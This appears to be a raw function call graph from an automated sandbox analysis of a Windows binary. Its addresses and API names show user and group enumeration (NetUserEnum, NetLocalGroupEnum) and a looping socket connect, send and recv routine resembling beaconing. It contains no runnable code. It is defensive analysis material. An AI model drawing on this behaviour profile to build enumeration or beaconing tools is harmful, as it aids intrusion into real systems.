7ff8b915d2bb 61368->61394 61405 7ff8b915de68 53 API calls 61371->61405 61375 7ff8b915e419 61372->61375 61376 7ff8b915e3f3 61372->61376 61373->61353 61398 7ff8b915e22c 16 API calls 61373->61398 61378 7ff8b915e3a5 61374->61378 61379 7ff8b915e4e3 61374->61379 61375->61353 61400 7ff8b915df82 53 API calls 61375->61400 61383 7ff8b915e4dc 61376->61383 61384 7ff8b915e3fe 61376->61384 61385 7ff8b915e491 61378->61385 61386 7ff8b915e3b0 61378->61386 61408 7ff8b915e2bc 16 API calls 61379->61408 61407 7ff8b915e143 49 API calls 61383->61407 61384->61353 61388 7ff8b915e405 61384->61388 61402 7ff8b915d2c9 18 API calls 61385->61402 61386->61353 61397 7ff8b915d342 14 API calls 61386->61397 61399 7ff8b915da46 57 API calls 61388->61399 61409 7ff8b915d110 61394->61409 61397->61353 61398->61353 61399->61362 61400->61353 61401->61353 61402->61353 61403->61353 61404->61362 61405->61353 61406->61353 61407->61353 61408->61353 61436 7ff8b91591fb 61409->61436 61414 7ff8b915d167 61417 7ff8b915a000 GetSystemTimeAsFileTime 61414->61417 61415 7ff8b915d160 61442 7ff8b9155a68 17 API calls 61415->61442 61418 7ff8b915d17a 61417->61418 61419 7ff8b915d298 61418->61419 61422 7ff8b915d1a6 strlen 61418->61422 61444 7ff8b9155a68 17 API calls 61419->61444 61421 7ff8b915d29d 61424 7ff8b91591fb 2 API calls 61421->61424 61426 7ff8b915d13a 61421->61426 61423 7ff8b9151292 6 API calls 61422->61423 61425 7ff8b915d1de GetProcessHeap HeapAlloc 61423->61425 61424->61426 61427 7ff8b915d27d 61425->61427 61428 7ff8b915d200 61425->61428 61426->61353 61430 7ff8b9151292 6 API calls 61427->61430 61429 7ff8b915a000 GetSystemTimeAsFileTime 61428->61429 61431 7ff8b915d22f strcpy 61429->61431 61432 7ff8b915d293 61430->61432 61443 7ff8b9151992 13 API calls 61431->61443 61432->61419 61434 7ff8b915d258 61434->61418 61435 7ff8b915d261 GetProcessHeap HeapFree 61434->61435 61435->61418 61437 7ff8b9159206 61436->61437 61438 7ff8b9159211 QueryPerformanceFrequency QueryPerformanceCounter 61436->61438 61437->61426 61439 7ff8b9155a47 EnterCriticalSection 61437->61439 61438->61437 61445 7ff8b9154049 61439->61445 61442->61426 61443->61434 61444->61421 61446 7ff8b9154065 61445->61446 61448 7ff8b9154055 61445->61448 61451 7ff8b9152fbf 61446->61451 61450 7ff8b915405f 61448->61450 61472 7ff8b915387f 61448->61472 61450->61414 61450->61415 61493 7ff8b9152edf 8 API calls 61451->61493 61453 7ff8b91535d6 61457 7ff8b9151292 6 API calls 61453->61457 61469 7ff8b91535df 61453->61469 61454 7ff8b91534d0 NetLocalGroupEnum 61455 7ff8b9152fd4 61454->61455 61455->61453 61455->61454 61458 7ff8b91534ad NetApiBufferFree 61455->61458 61461 7ff8b9153546 GetProcessHeap HeapAlloc 61455->61461 61456 7ff8b9153729 61460 7ff8b9151292 6 API calls 61456->61460 61457->61469 61458->61455 61463 7ff8b9153609 61460->61463 61464 7ff8b9153579 61461->61464 61470 7ff8b9152fe3 61461->61470 61462 7ff8b91535ec 61465 7ff8b9151292 6 API calls 61462->61465 61463->61448 61466 7ff8b91535b4 61464->61466 61467 7ff8b9153585 memcpy GetProcessHeap HeapFree 61464->61467 61465->61463 61466->61448 61467->61466 61468 7ff8b9151292 6 API calls 61468->61470 61469->61456 61471 7ff8b91535e7 61469->61471 61470->61455 61470->61468 61494 7ff8b9152edf 8 API calls 61471->61494 61473 7ff8b915379f 8 API calls 61472->61473 61478 7ff8b9153894 61473->61478 61474 7ff8b9153ed7 61475 7ff8b9153ee0 61474->61475 61477 7ff8b9151292 6 API calls 61474->61477 61491 7ff8b9154014 61475->61491 61492 7ff8b9153ee8 61475->61492 61476 7ff8b9153dba NetUserEnum 61476->61478 61477->61475 61478->61474 61478->61476 61480 7ff8b9153d97 NetApiBufferFree 61478->61480 61482 7ff8b9153e36 GetProcessHeap HeapAlloc 61478->61482 61479 7ff8b9151292 6 API calls 61485 7ff8b9153f0a 61479->61485 61480->61478 61481 7ff8b915379f 8 API calls 61486 7ff8b9153eed 61481->61486 61483 7ff8b9153e70 61482->61483 61484 7ff8b91538a3 61482->61484 61487 7ff8b9153e7c memcpy GetProcessHeap HeapFree 61483->61487 61488 7ff8b9153eb5 61483->61488 61484->61478 61489 7ff8b9151292 6 API calls 61484->61489 61485->61450 61486->61485 61490 7ff8b9151292 6 API calls 61486->61490 61487->61488 61488->61450 61489->61484 61490->61485 61491->61479 61492->61481 61493->61455 61494->61462 61495 7ff8bfb5364a 61504 7ff8bfb53655 61495->61504 61496 7ff8bfb5375e 61497 7ff8bfb5376b 61496->61497 61554 7ff8bfb52415 10 API calls 61496->61554 61499 7ff8bfb5367d Sleep 61499->61504 61502 7ff8bfb53732 Sleep 61502->61504 61503 7ff8bfb52415 10 API calls 61503->61504 61504->61496 61504->61499 61504->61502 61504->61503 61506 7ff8bfb5371e memcpy 61504->61506 61507 7ff8bfb526ac socket 61504->61507 61542 7ff8bfb52b5a 61504->61542 61553 7ff8bfb53580 9 API calls 61504->61553 61506->61504 61508 7ff8bfb528ab WSAGetLastError 61507->61508 61509 7ff8bfb526e3 61507->61509 61512 7ff8bfb52fd2 6 API calls 61508->61512 61510 7ff8bfb52705 61509->61510 61511 7ff8bfb526e7 61509->61511 61515 7ff8bfb52349 8 API calls 61510->61515 61555 7ff8bfb52349 61511->61555 61514 7ff8bfb528cf 61512->61514 61517 7ff8bfb528d9 61514->61517 61518 7ff8bfb5271f 61514->61518 61519 7ff8bfb52703 61515->61519 61523 7ff8bfb52fd2 6 API calls 61517->61523 61521 7ff8bfb52fd2 6 API calls 61518->61521 61520 7ff8bfb52717 61519->61520 61568 7ff8bfb5247a setsockopt 61519->61568 61572 7ff8bfb52415 10 API calls 61520->61572 61524 7ff8bfb52740 61521->61524 61522 7ff8bfb5275e 61522->61520 61527 7ff8bfb52763 htonl htons connect 61522->61527 61523->61524 61524->61504 61529 7ff8bfb527bc WSAGetLastError 61527->61529 61530 7ff8bfb527a1 61527->61530 61532 7ff8bfb527cd 61529->61532 61533 7ff8bfb5287e WSAGetLastError 61529->61533 61531 7ff8bfb52349 8 API calls 61530->61531 61536 7ff8bfb527ae 61531->61536 61532->61520 61534 7ff8bfb527d5 select 61532->61534 61535 7ff8bfb52fd2 6 API calls 61533->61535 61537 7ff8bfb52836 61534->61537 61538 7ff8bfb52860 61534->61538 61535->61520 61536->61514 61536->61520 61537->61530 61539 7ff8bfb5283c WSAGetLastError 61537->61539 61540 7ff8bfb52fd2 6 API calls 61538->61540 61541 7ff8bfb52fd2 6 API calls 61539->61541 61540->61520 61541->61520 61543 7ff8bfb52be8 61542->61543 61544 7ff8bfb52b74 61542->61544 61545 7ff8bfb52fd2 6 API calls 61543->61545 61544->61543 61546 7ff8bfb52b79 recv 61544->61546 61549 7ff8bfb52b93 61545->61549 61547 7ff8bfb52b9c WSAGetLastError 61546->61547 61548 7ff8bfb52b8f 61546->61548 61547->61549 61550 7ff8bfb52bb0 61547->61550 61548->61549 61551 7ff8bfb52fd2 6 API calls 61548->61551 61549->61504 61552 7ff8bfb52fd2 6 API calls 61550->61552 61551->61549 61552->61549 61553->61504 61554->61497 61556 7ff8bfb52359 ioctlsocket 61555->61556 61558 7ff8bfb5237c 61556->61558 61559 7ff8bfb5238d WSAGetLastError 61556->61559 61558->61522 61561 7ff8bfb52294 setsockopt 61558->61561 61560 7ff8bfb52fd2 6 API calls 61559->61560 61560->61558 61562 7ff8bfb522c9 setsockopt 61561->61562 61563 7ff8bfb52324 WSAGetLastError 61561->61563 61565 7ff8bfb522ff WSAGetLastError 61562->61565 61566 7ff8bfb522f5 61562->61566 61564 7ff8bfb52fd2 6 API calls 61563->61564 61564->61566 61567 7ff8bfb52fd2 6 API calls 61565->61567 61566->61519 61567->61566 61569 7ff8bfb524b7 61568->61569 61570 7ff8bfb524c1 WSAGetLastError 61568->61570 61569->61522 61571 7ff8bfb52fd2 6 API calls 61570->61571 61571->61569 61572->61518 61573 7ff8bfab67c4 61586 7ff8bfab67d0 61573->61586 61574 7ff8bfab68c1 EnterCriticalSection 61581 7ff8bfab68ce 61574->61581 61575 7ff8bfab6869 EnterCriticalSection 61575->61586 61576 7ff8bfab68da WaitForSingleObject 61579 7ff8bfab14c5 10 API calls 61576->61579 61577 7ff8bfab6929 LeaveCriticalSection 61578 7ff8bfab67f6 LeaveCriticalSection 61580 7ff8bfab68b4 Sleep SleepEx 61578->61580 61578->61586 61579->61581 61580->61574 61581->61576 61581->61577 61583 7ff8bfab6910 GetProcessHeap HeapFree 61581->61583 61582 7ff8bfaba202 6 API calls 61584 7ff8bfab6823 WaitForSingleObject 61582->61584 61583->61581 61585 7ff8bfab14c5 10 API calls 61584->61585 61585->61586 61586->61574 61586->61575 61586->61578 61586->61582 61587 7ff8bfab6848 GetProcessHeap HeapFree 61586->61587 61587->61586 61588 7ff8b918ef2a 61593 7ff8b918ef35 61588->61593 61589 7ff8b918f03e 61590 7ff8b918f04b 61589->61590 61655 7ff8b9184e55 10 API calls 61589->61655 61593->61589 61594 7ff8b918ef5d Sleep 61593->61594 61596 7ff8b918f012 Sleep 61593->61596 61597 7ff8b9184e55 10 API calls 61593->61597 61599 7ff8b918effe memcpy 61593->61599 61600 7ff8b91850ec socket 61593->61600 61635 7ff8b918559a 61593->61635 61646 7ff8b918ee60 61593->61646 61594->61593 61596->61593 61597->61593 61599->61593 61601 7ff8b91852eb WSAGetLastError 61600->61601 61602 7ff8b9185123 61600->61602 61605 7ff8b9181292 6 API calls 61601->61605 61603 7ff8b9185127 61602->61603 61604 7ff8b9185145 61602->61604 61656 7ff8b9184d89 61603->61656 61608 7ff8b9184d89 8 API calls 61604->61608 61607 7ff8b918530f 61605->61607 61610 7ff8b9185319 61607->61610 61611 7ff8b918515f 61607->61611 61612 7ff8b9185143 61608->61612 61616 7ff8b9181292 6 API calls 61610->61616 61614 7ff8b9181292 6 API calls 61611->61614 61613 7ff8b9185157 61612->61613 61669 7ff8b9184eba setsockopt 61612->61669 61673 7ff8b9184e55 10 API calls 61613->61673 61617 7ff8b9185180 61614->61617 61615 7ff8b918519e 61615->61613 61620 7ff8b91851a3 htonl htons connect 61615->61620 61616->61617 61617->61593 61622 7ff8b91851fc WSAGetLastError 61620->61622 61623 7ff8b91851e1 61620->61623 61625 7ff8b91852be WSAGetLastError 61622->61625 61626 7ff8b918520d 61622->61626 61624 7ff8b9184d89 8 API calls 61623->61624 61629 7ff8b91851ee 61624->61629 61628 7ff8b9181292 6 API calls 61625->61628 61626->61613 61627 7ff8b9185215 select 61626->61627 61630 7ff8b9185276 61627->61630 61631 7ff8b91852a0 61627->61631 61628->61613 61629->61607 61629->61613 61630->61623 61632 7ff8b918527c WSAGetLastError 61630->61632 61633 7ff8b9181292 6 API calls 61631->61633 61634 7ff8b9181292 6 API calls 61632->61634 61633->61613 61634->61613 61636 7ff8b9185628 61635->61636 61637 7ff8b91855b4 61635->61637 61638 7ff8b9181292 6 API calls 61636->61638 61637->61636 61639 7ff8b91855b9 recv 61637->61639 61642 7ff8b91855d3 61638->61642 61640 7ff8b91855cf 61639->61640 61641 7ff8b91855dc WSAGetLastError 61639->61641 61640->61642 61645 7ff8b9181292 6 API calls 61640->61645 61641->61642 61643 7ff8b91855f0 61641->61643 61642->61593 61644 7ff8b9181292 6 API calls 61643->61644 61644->61642 61645->61642 61647 7ff8b918ef22 61646->61647 61648 7ff8b918ee78 61646->61648 61647->61593 61648->61647 61674 7ff8b9187cc0 61648->61674 61651 7ff8b918eea8 61652 7ff8b918ef14 LeaveCriticalSection 61651->61652 61653 7ff8b9181292 6 API calls 61651->61653 61677 7ff8b91900aa 61651->61677 61652->61647 61653->61651 61655->61590 61657 7ff8b9184d99 ioctlsocket 61656->61657 61659 7ff8b9184dcd WSAGetLastError 61657->61659 61660 7ff8b9184dbc 61657->61660 61661 7ff8b9181292 6 API calls 61659->61661 61660->61615 61662 7ff8b9184cd4 setsockopt 61660->61662 61661->61660 61663 7ff8b9184d09 setsockopt 61662->61663 61664 7ff8b9184d64 WSAGetLastError 61662->61664 61665 7ff8b9184d3f WSAGetLastError 61663->61665 61666 7ff8b9184d35 61663->61666 61667 7ff8b9181292 6 API calls 61664->61667 61668 7ff8b9181292 6 API calls 61665->61668 61666->61612 61667->61666 61668->61666 61670 7ff8b9184f01 WSAGetLastError 61669->61670 61672 7ff8b9184ef7 61669->61672 61671 7ff8b9181292 6 API calls 61670->61671 61671->61672 61672->61615 61673->61611 61675 7ff8b9187ccb EnterCriticalSection 61674->61675 61676 7ff8b9187cd6 GetSystemTimeAsFileTime 61674->61676 61675->61651 61676->61675 61678 7ff8b91900da 61677->61678 61688 7ff8b9190102 61677->61688 61679 7ff8b91900e4 61678->61679 61680 7ff8b919014a 61678->61680 61681 7ff8b9190120 61679->61681 61682 7ff8b91900e6 61679->61682 61708 7ff8b918f8ba 91 API calls 61680->61708 61684 7ff8b9190151 61681->61684 61685 7ff8b9190127 61681->61685 61686 7ff8b9190158 61682->61686 61687 7ff8b91900ed 61682->61687 61709 7ff8b918f92f 47 API calls 61684->61709 61690 7ff8b9190143 61685->61690 61691 7ff8b919012e 61685->61691 61710 7ff8b918fa61 24 API calls 61686->61710 61692 7ff8b919010b 61687->61692 61693 7ff8b91900ef 61687->61693 61688->61651 61702 7ff8b918f7c8 61690->61702 61691->61688 61707 7ff8b918f7d6 184 API calls 61691->61707 61692->61688 61706 7ff8b918fb83 15 API calls 61692->61706 61695 7ff8b91900f6 61693->61695 61696 7ff8b919015f 61693->61696 61695->61688 61705 7ff8b918fc03 34 API calls 61695->61705 61711 7ff8b918fb0a 18 API calls 61696->61711 61712 7ff8b918f780 61702->61712 61705->61688 61706->61688 61707->61688 61708->61688 61709->61688 61710->61688 61711->61688 61719 7ff8b918e2fb 61712->61719 61715 7ff8b918f7a1 61715->61688 61718 7ff8b918e2fb 2 API calls 61718->61715 61720 7ff8b918e311 QueryPerformanceFrequency QueryPerformanceCounter 61719->61720 61721 7ff8b918e306 61719->61721 61720->61721 61721->61715 61722 7ff8b9186c3d 61721->61722 61759 7ff8b9186bff 61722->61759 61725 7ff8b9186c53 61725->61718 61726 7ff8b9181770 8 API calls 61727 7ff8b9186c73 61726->61727 61728 7ff8b918e0f1 8 API calls 61727->61728 61729 7ff8b9186c88 61728->61729 61730 7ff8b9186d39 61729->61730 61731 7ff8b9186c92 strlen 61729->61731 61730->61725 61734 7ff8b9186d41 strlen 61730->61734 61732 7ff8b9186caf 61731->61732 61733 7ff8b9186cc8 strlen 61731->61733 61732->61733 61735 7ff8b9186cb4 strlen 61732->61735 61764 7ff8b918d196 10 API calls 61733->61764 61737 7ff8b9186d6e strlen 61734->61737 61738 7ff8b9186d58 61734->61738 61735->61733 61766 7ff8b918d196 10 API calls 61737->61766 61738->61737 61740 7ff8b9186d5d strlen 61738->61740 61739 7ff8b9186d0e 61739->61725 61765 7ff8b918dcc8 8 API calls 61739->61765 61740->61737 61742 7ff8b9186db1 61744 7ff8b9186dc7 CompareFileTime 61742->61744 61755 7ff8b9186dbe 61742->61755 61746 7ff8b9186ddb 61744->61746 61747 7ff8b9186df7 61744->61747 61745 7ff8b9186d37 61745->61730 61746->61755 61767 7ff8b9184988 22 API calls 61746->61767 61769 7ff8b918c6f1 8 API calls 61747->61769 61750 7ff8b9186de4 61752 7ff8b9186de8 61750->61752 61770 7ff8b9184013 7 API calls 61750->61770 61768 7ff8b91849a3 GetProcessHeap HeapFree GetProcessHeap HeapFree LeaveCriticalSection 61752->61768 61753 7ff8b9186e2c 61753->61752 61771 7ff8b9184097 42 API calls 61753->61771 61755->61725 61757 7ff8b9186e41 61757->61752 61772 7ff8b9183c9c 19 API calls 61757->61772 61773 7ff8b9185ac0 61759->61773 61763 7ff8b9186c0c 61763->61725 61763->61726 61764->61739 61765->61745 61766->61742 61767->61750 61768->61755 61769->61746 61770->61753 61771->61757 61772->61752 61774 7ff8b9182472 9 API calls 61773->61774 61775 7ff8b9185b03 61774->61775 61776 7ff8b9185b07 strlen 61775->61776 61783 7ff8b9185b73 61775->61783 61777 7ff8b9185b40 strcmp 61776->61777 61779 7ff8b9185b81 61777->61779 61777->61783 61787 7ff8b918dcc8 8 API calls 61779->61787 61781 7ff8b9185ba7 61782 7ff8b9185bb9 61781->61782 61781->61783 61788 7ff8b918d9e9 8 API calls 61782->61788 61783->61763 61786 7ff8b918533e 27 API calls 61783->61786 61785 7ff8b9185bc3 61785->61783 61786->61763 61787->61781 61788->61785 61789 7ff8bfb89b0a 61792 7ff8bfb89b15 61789->61792 61790 7ff8bfb89c1e 61791 7ff8bfb89c2b 61790->61791 61845 7ff8bfb819a5 61790->61845 61792->61790 61793 7ff8bfb89b3d Sleep 61792->61793 61796 7ff8bfb819a5 23 API calls 61792->61796 61797 7ff8bfb820ea 21 API calls 61792->61797 61798 7ff8bfb89bf2 Sleep 61792->61798 61800 7ff8bfb89bde memcpy 61792->61800 61801 7ff8bfb81c3c socket 61792->61801 61836 7ff8bfb89a40 61792->61836 61793->61792 61796->61792 61797->61792 61798->61792 61800->61792 61802 7ff8bfb81e3b WSAGetLastError 61801->61802 61803 7ff8bfb81c73 61801->61803 61806 7ff8bfb81292 19 API calls 61802->61806 61804 7ff8bfb81c77 61803->61804 61805 7ff8bfb81c95 61803->61805 61854 7ff8bfb818d9 61804->61854 61809 7ff8bfb818d9 21 API calls 61805->61809 61808 7ff8bfb81e5f 61806->61808 61811 7ff8bfb81e69 61808->61811 61812 7ff8bfb81caf 61808->61812 61813 7ff8bfb81c93 61809->61813 61815 7ff8bfb81292 19 API calls 61811->61815 61817 7ff8bfb81292 19 API calls 61812->61817 61816 7ff8bfb81ca7 61813->61816 61867 7ff8bfb81a0a setsockopt 61813->61867 61814 7ff8bfb81cee 61814->61816 61819 7ff8bfb81cf3 htonl htons connect 61814->61819 61821 7ff8bfb81cd0 61815->61821 61822 7ff8bfb819a5 23 API calls 61816->61822 61817->61821 61823 7ff8bfb81d4c WSAGetLastError 61819->61823 61824 7ff8bfb81d31 61819->61824 61821->61792 61822->61812 61826 7ff8bfb81e0e WSAGetLastError 61823->61826 61827 7ff8bfb81d5d 61823->61827 61825 7ff8bfb818d9 21 API calls 61824->61825 61829 7ff8bfb81d3e 61825->61829 61828 7ff8bfb81292 19 API calls 61826->61828 61827->61816 61830 7ff8bfb81d65 select 61827->61830 61828->61816 61829->61808 61829->61816 61831 7ff8bfb81dc6 61830->61831 61832 7ff8bfb81df0 61830->61832 61831->61824 61833 7ff8bfb81dcc WSAGetLastError 61831->61833 61834 7ff8bfb81292 19 API calls 61832->61834 61835 7ff8bfb81292 19 API calls 61833->61835 61834->61816 61835->61816 61837 7ff8bfb89b02 61836->61837 61838 7ff8bfb89a58 61836->61838 61837->61792 61838->61837 61871 7ff8bfb82800 61838->61871 61841 7ff8bfb89af4 LeaveCriticalSection 61841->61837 61842 7ff8bfb89a88 61842->61841 61843 7ff8bfb81292 19 API calls 61842->61843 61874 7ff8bfb8330e 61842->61874 61843->61842 61846 7ff8bfb819b9 61845->61846 61853 7ff8bfb819b3 61845->61853 62130 7ff8bfb81942 shutdown 61846->62130 61849 7ff8bfb819e9 WSAGetLastError 61852 7ff8bfb81292 19 API calls 61849->61852 61850 7ff8bfb819d1 61851 7ff8bfb81292 19 API calls 61850->61851 61851->61853 61852->61853 61853->61791 61855 7ff8bfb818e9 ioctlsocket 61854->61855 61857 7ff8bfb8191d WSAGetLastError 61855->61857 61859 7ff8bfb8190c 61855->61859 61858 7ff8bfb81292 19 API calls 61857->61858 61858->61859 61859->61814 61860 7ff8bfb81824 setsockopt 61859->61860 61861 7ff8bfb81859 setsockopt 61860->61861 61862 7ff8bfb818b4 WSAGetLastError 61860->61862 61863 7ff8bfb8188f WSAGetLastError 61861->61863 61864 7ff8bfb81885 61861->61864 61865 7ff8bfb81292 19 API calls 61862->61865 61866 7ff8bfb81292 19 API calls 61863->61866 61864->61813 61865->61864 61866->61864 61868 7ff8bfb81a47 61867->61868 61869 7ff8bfb81a51 WSAGetLastError 61867->61869 61868->61814 61870 7ff8bfb81292 19 API calls 61869->61870 61870->61868 61872 7ff8bfb8280b EnterCriticalSection 61871->61872 61873 7ff8bfb82816 GetSystemTimeAsFileTime 61871->61873 61872->61842 61873->61872 61875 7ff8bfb8339c 61874->61875 61876 7ff8bfb83330 61874->61876 61877 7ff8bfb833b7 61875->61877 61878 7ff8bfb833a6 61875->61878 61883 7ff8bfb83347 61876->61883 61943 7ff8bfb8464b 61876->61943 61879 7ff8bfb8464b 2 API calls 61877->61879 61882 7ff8bfb82800 GetSystemTimeAsFileTime 61878->61882 61919 7ff8bfb83392 61878->61919 61879->61919 61885 7ff8bfb8348a 61882->61885 61889 7ff8bfb8394a 61883->61889 61890 7ff8bfb83957 GetProcessHeap HeapAlloc 61883->61890 61883->61919 61884 7ff8bfb837bb 61886 7ff8bfb8384f 61884->61886 61895 7ff8bfb83800 61884->61895 61887 7ff8bfb84170 21 API calls 61885->61887 61888 7ff8bfb8464b 2 API calls 61886->61888 61891 7ff8bfb83570 61887->61891 61892 7ff8bfb83859 61888->61892 61889->61890 61893 7ff8bfb8397f memcpy 61890->61893 61894 7ff8bfb839f1 61890->61894 61975 7ff8bfb88684 25 API calls 61891->61975 61946 7ff8bfb82f80 61892->61946 61898 7ff8bfb839bf 61893->61898 61900 7ff8bfb81292 19 API calls 61894->61900 61903 7ff8bfb8386f 61895->61903 61904 7ff8bfb8382a 61895->61904 61907 7ff8bfb839c7 61898->61907 61985 7ff8bfb832a5 21 API calls 61898->61985 61899 7ff8bfb8358c 61901 7ff8bfb83594 61899->61901 61902 7ff8bfb83701 61899->61902 61942 7ff8bfb836f7 61900->61942 61908 7ff8bfb84170 21 API calls 61901->61908 61982 7ff8bfb85fd5 43 API calls 61902->61982 61952 7ff8bfb8305e 61903->61952 61909 7ff8bfb8387e 61904->61909 61910 7ff8bfb83834 61904->61910 61915 7ff8bfb839d5 GetProcessHeap HeapFree 61907->61915 61907->61919 61912 7ff8bfb835a2 61908->61912 61911 7ff8bfb8464b 2 API calls 61909->61911 61913 7ff8bfb8464b 2 API calls 61910->61913 61914 7ff8bfb83888 61911->61914 61976 7ff8bfb88684 25 API calls 61912->61976 61913->61919 61914->61919 61922 7ff8bfb82800 GetSystemTimeAsFileTime 61914->61922 61915->61919 61917 7ff8bfb835be 61920 7ff8bfb8374e 61917->61920 61921 7ff8bfb835c6 61917->61921 61918 7ff8bfb8372e 61918->61901 61919->61842 61983 7ff8bfb85fd5 43 API calls 61920->61983 61977 7ff8bfb84692 21 API calls 61921->61977 61925 7ff8bfb838e5 61922->61925 61926 7ff8bfb8464b 2 API calls 61925->61926 61930 7ff8bfb838f7 61926->61930 61927 7ff8bfb835d0 61978 7ff8bfb84818 23 API calls 61927->61978 61929 7ff8bfb8377b 61929->61921 61984 7ff8bfb89c52 26 API calls 61930->61984 61933 7ff8bfb83605 61979 7ff8bfb8ac80 71 API calls 61933->61979 61936 7ff8bfb83671 61937 7ff8bfb83698 61936->61937 61980 7ff8bfb81770 20 API calls 61936->61980 61938 7ff8bfb836c8 61937->61938 61939 7ff8bfb836b1 GetProcessHeap HeapFree 61937->61939 61981 7ff8bfb89c52 26 API calls 61938->61981 61939->61938 61942->61919 61944 7ff8bfb837a5 61943->61944 61945 7ff8bfb84661 QueryPerformanceFrequency QueryPerformanceCounter 61943->61945 61944->61883 61944->61884 61945->61944 61947 7ff8bfb82fad 61946->61947 61950 7ff8bfb82f90 61946->61950 61948 7ff8bfb82fbe 61947->61948 61949 7ff8bfb819a5 23 API calls 61947->61949 61948->61919 61949->61948 61950->61947 61986 7ff8bfb8959c 61950->61986 61953 7ff8bfb83072 61952->61953 61955 7ff8bfb831f6 61952->61955 61953->61955 61957 7ff8bfb83097 61953->61957 61954 7ff8bfb8321e 61956 7ff8bfb8322b 61954->61956 61962 7ff8bfb81c3c 40 API calls 61954->61962 61955->61954 61958 7ff8bfb830d0 61955->61958 61959 7ff8bfb81c3c 40 API calls 61955->61959 61956->61958 61965 7ff8bfb8464b 2 API calls 61956->61965 61960 7ff8bfb830f3 61957->61960 61961 7ff8bfb830a1 61957->61961 61958->61919 61959->61954 62031 7ff8bfb8961b 61960->62031 61963 7ff8bfb830ae 61961->61963 61964 7ff8bfb8317a 61961->61964 61962->61956 61963->61958 62069 7ff8bfb8991a 80 API calls 61963->62069 62070 7ff8bfb89428 60 API calls 61964->62070 61965->61958 61969 7ff8bfb83186 61969->61958 61973 7ff8bfb8464b 2 API calls 61969->61973 61971 7ff8bfb8464b 2 API calls 61971->61958 61972 7ff8bfb830c8 61972->61958 61974 7ff8bfb8464b 2 API calls 61972->61974 61973->61958 61974->61958 61975->61899 61976->61917 61977->61927 61978->61933 61979->61936 61980->61937 61981->61942 61982->61918 61983->61929 61984->61919 61985->61907 61987 7ff8bfb895b8 61986->61987 61988 7ff8bfb895aa 61986->61988 61987->61947 61994 7ff8bfb89570 61988->61994 61993 7ff8bfb819a5 23 API calls 61993->61987 61995 7ff8bfb8957d 61994->61995 61996 7ff8bfb89587 61994->61996 61995->61996 61997 7ff8bfb819a5 23 API calls 61995->61997 61996->61987 61998 7ff8bfb890ca 61996->61998 61997->61996 62000 7ff8bfb890f9 61998->62000 61999 7ff8bfb8ed60 14 API calls 61999->62000 62000->61999 62001 7ff8bfb8915e 62000->62001 62002 7ff8bfb891bb GetProcessHeap HeapAlloc 62000->62002 62003 7ff8bfb8910d GetProcessHeap HeapReAlloc 62000->62003 62004 7ff8bfb81292 19 API calls 62001->62004 62002->62000 62006 7ff8bfb891df 62002->62006 62003->62000 62007 7ff8bfb891f7 62003->62007 62005 7ff8bfb89174 strlen 62004->62005 62017 7ff8bfb890b2 62005->62017 62009 7ff8bfb81292 19 API calls 62006->62009 62010 7ff8bfb81292 19 API calls 62007->62010 62012 7ff8bfb891f5 62009->62012 62013 7ff8bfb8920d 62010->62013 62015 7ff8bfb89229 62012->62015 62013->62015 62016 7ff8bfb89212 GetProcessHeap HeapFree 62013->62016 62014 7ff8bfb8919a GetProcessHeap HeapFree 62014->62015 62015->61993 62016->62015 62020 7ff8bfb8219d 62017->62020 62021 7ff8bfb8224c 62020->62021 62022 7ff8bfb821c8 62020->62022 62023 7ff8bfb81292 19 API calls 62021->62023 62022->62021 62025 7ff8bfb821cd 62022->62025 62024 7ff8bfb82220 62023->62024 62024->62014 62024->62015 62026 7ff8bfb82219 62025->62026 62027 7ff8bfb821d6 send 62025->62027 62026->62024 62030 7ff8bfb81292 19 API calls 62026->62030 62027->62025 62028 7ff8bfb821fa WSAGetLastError 62027->62028 62029 7ff8bfb81292 19 API calls 62028->62029 62029->62026 62030->62024 62032 7ff8bfb89650 62031->62032 62033 7ff8bfb8312f 62031->62033 62034 7ff8bfb896bf 62032->62034 62035 7ff8bfb896ab strlen 62032->62035 62033->61958 62033->61971 62071 7ff8bfb82cb2 62034->62071 62035->62034 62056 7ff8bfb8978d 62035->62056 62039 7ff8bfb8959c 34 API calls 62039->62033 62041 7ff8bfb890ca 30 API calls 62042 7ff8bfb8972e 62041->62042 62042->62056 62080 7ff8bfb89331 62042->62080 62046 7ff8bfb89773 62049 7ff8bfb89777 62046->62049 62088 7ff8bfb88c26 strcmp 62046->62088 62048 7ff8bfb897c5 62050 7ff8bfb897d1 strlen 62048->62050 62048->62056 62049->62056 62087 7ff8bfb88c8d 6 API calls 62049->62087 62052 7ff8bfb897e5 62050->62052 62050->62056 62052->62049 62053 7ff8bfb897f4 strcpy 62052->62053 62089 7ff8bfb88c8d 6 API calls 62053->62089 62055 7ff8bfb89808 62057 7ff8bfb890ca 30 API calls 62055->62057 62056->62033 62056->62039 62058 7ff8bfb89817 62057->62058 62058->62056 62059 7ff8bfb89331 41 API calls 62058->62059 62060 7ff8bfb89827 62059->62060 62060->62056 62090 7ff8bfb88b20 strcmp strcmp strcmp strcmp 62060->62090 62062 7ff8bfb89855 62062->62049 62069->61972 62070->61969 62072 7ff8bfb82cce 62071->62072 62073 7ff8bfb82d0a 62071->62073 62072->62073 62093 7ff8bfb82c92 rand_s 62072->62093 62075 7ff8bfb893f4 62073->62075 62094 7ff8bfb89084 62075->62094 62078 7ff8bfb89419 62078->62041 62078->62056 62120 7ff8bfb8924c 62080->62120 62083 7ff8bfb8934c 62129 7ff8bfb88e50 37 API calls 62083->62129 62084 7ff8bfb89356 62084->62056 62086 7ff8bfb88b20 strcmp strcmp strcmp strcmp 62084->62086 62086->62046 62087->62056 62088->62048 62089->62055 62090->62062 62093->62072 62095 7ff8bfb81c3c 40 API calls 62094->62095 62096 7ff8bfb89091 62095->62096 62097 7ff8bfb8909a 62096->62097 62113 7ff8bfb81a76 setsockopt 62096->62113 62097->62078 62099 7ff8bfb89365 62097->62099 62100 7ff8bfb890ca 30 API calls 62099->62100 62101 7ff8bfb8937a 62100->62101 62102 7ff8bfb893c3 62101->62102 62103 7ff8bfb89331 41 API calls 62101->62103 62105 7ff8bfb819a5 23 API calls 62102->62105 62104 7ff8bfb89386 62103->62104 62117 7ff8bfb88b20 strcmp strcmp strcmp strcmp 62104->62117 62108 7ff8bfb893d0 62105->62108 62107 7ff8bfb893b2 62107->62102 62110 7ff8bfb893b6 62107->62110 62109 7ff8bfb893be 62108->62109 62119 7ff8bfb88c8d 6 API calls 62108->62119 62109->62078 62118 7ff8bfb88c8d 6 API calls 62110->62118 62114 7ff8bfb81ab5 WSAGetLastError 62113->62114 62116 7ff8bfb81aab 62113->62116 62115 7ff8bfb81292 19 API calls 62114->62115 62115->62116 62116->62097 62117->62107 